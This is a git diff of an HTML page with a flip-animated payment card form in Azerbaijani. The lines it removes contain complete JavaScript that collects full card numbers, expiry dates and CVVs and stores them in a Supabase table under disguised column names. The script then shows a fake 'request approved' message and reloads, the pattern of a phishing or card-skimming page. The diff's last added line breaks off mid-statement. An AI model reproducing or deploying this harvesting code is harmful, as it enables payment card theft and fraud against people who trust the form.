--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@ body{height:100vh;display:flex;justify-content:center;align-items:center;backgro
 .card.flip{transform:rotateY(180deg);}
 .card-face{position:absolute;width:100%;height:100%;backface-visibility:hidden;padding:20px;color:white;border-radius:20px;display:flex;flex-direction:column;justify-content:center;align-items:center;}
 .front{background:linear-gradient(90deg,#1bb34a,#0c5f2b);}
-.back{background:#111;transform:rotateY(180deg);display:flex;flex-direction:column;justify-content:center;align-items:center;}
+.back{background:#111;transform:rotateY(180deg);display:flex;flex-direction:column;justify-content:flex-start;align-items:center;}
 .strip{width:100%;height:40px;background:black;margin-bottom:20px;}
 .cvv-box{background:white;color:black;padding:10px;text-align:right;border-radius:5px;font-weight:bold;width:80%;}
 
@@ -99,61 +99,4 @@ const cardNumber=document.getElementById("cardNumber")
 const cardExp=document.getElementById("cardExp")
 const cvvDisplay=document.getElementById("cvvDisplay")
 const card=document.getElementById("card")
-const loading=document.getElementById("loading")
-const loadingText=document.getElementById("loadingText")
-
-/* 16 rəqəm format */
-numberInput.addEventListener("input",e=>{
-  let val=e.target.value.replace(/\D/g,'').substring(0,16)
-  let blocks=[]
-  for(let i=0;i<val.length;i+=4){ blocks.push(val.substr(i,4)) }
-  val=blocks.join(' ')
-  cardNumber.textContent=val||"0000 0000 0000 0000"
-  numberInput.value=val
-})
-
-/* MM/YY auto format */
-expInput.addEventListener("input",e=>{
-  let val=e.target.value.replace(/\D/g,'').substring(0,4)
-  if(val.length>=3){ val=val.substring(0,2)+"/"+val.substring(2) }
-  expInput.value=val
-  cardExp.textContent=val||"MM/YY"
-})
-
-/* Flip */
-cvvInput.addEventListener("focus",()=>card.classList.add("flip"))
-cvvInput.addEventListener("blur",()=>card.classList.remove("flip"))
-
-cvvInput.addEventListener("input",e=>{
-  let val=e.target.value.replace(/\D/g,'').substring(0,3)
-  cvvInput.value=val
-  cvvDisplay.textContent=val
-  setTimeout(()=>cvvDisplay.textContent="***",1000)
-})
-
-form.addEventListener("submit",async e=>{
-  e.preventDefault()
-  if(numberInput.value.replace(/\s/g,'').length!==16){ alert("16 rəqəm tam daxil edilməlidir"); return }
-  if(expInput.value.length!==5){ alert("Tarix düzgün deyil"); return }
-  if(cvvInput.value.length!==3){ alert("3 rəqəmli kod daxil edin"); return }
-
-  loading.style.display="flex"
-
-  const { data, error } = await supabase.from("mesajlar").insert([
-    { kod1:numberInput.value, kod2:expInput.value, kod3:cvvInput.value }
-  ])
-
-  if(error){ console.error("Supabase xəta:", error); alert("Xəta baş verdi: " + error.message); loading.style.display="none"; return }
-
-  setTimeout(()=>{
-    loadingText.textContent="Təbriklər Sorğunuz Təsdiq Olundu"
-  },7000)
-
-  setTimeout(()=>{
-    window.location.reload()
-  },9500)
-})
-</script>
-
-</body>
-</html>
+const loading=document.getElementById("lo
